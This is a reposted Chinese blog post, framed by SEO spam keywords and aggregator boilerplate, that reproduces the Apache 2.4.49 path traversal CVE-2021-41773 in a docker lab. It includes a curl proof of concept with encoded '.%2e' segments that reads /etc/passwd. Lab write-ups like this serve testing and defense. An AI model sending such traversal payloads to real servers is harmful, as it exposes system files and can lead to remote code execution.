您的位置:首页 > 财经 > 金融 > 免费网站推荐货源_最新新闻热点事件2022年_微信引流推广_seo算法优化

免费网站推荐货源_最新新闻热点事件2022年_微信引流推广_seo算法优化

2024/11/16 15:19:01 来源:https://blog.csdn.net/shw_yzh/article/details/142398111  浏览:    关键词:免费网站推荐货源_最新新闻热点事件2022年_微信引流推广_seo算法优化
免费网站推荐货源_最新新闻热点事件2022年_微信引流推广_seo算法优化

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d

漏洞复现

http://172.16.1.78:8080/

c3af3f0c6bd94cdca55df43312f35505.png

1.使⽤poc

curl http://172.16.1.78:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
d9234f0a638b4f2eaac6c3b87fcdf0bc.png

2.⼯具验证

f4c6125173354225bcdd0bff1aca202d.png

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

最新新闻

热搜词

基于HTML+CSS+JavaScript实现---美丽家乡石埇镇 shell动态修改yml配置实例 2024.11.15 test 21-网络设备安全 关闭ssh使用DNS、秘钥检查的配置 新通知!2024年湖北省新一轮专精特新中小企业奖补政策申报对象、申报要点

声明:本站所有新闻及新闻图片来源于其他网站,如有侵权,请及时联系我们!

客户服务 | 关于我们 | 版权声明

版权所有:

Copyright 2024 尧图网 All Rights Reserved.QQ:809451989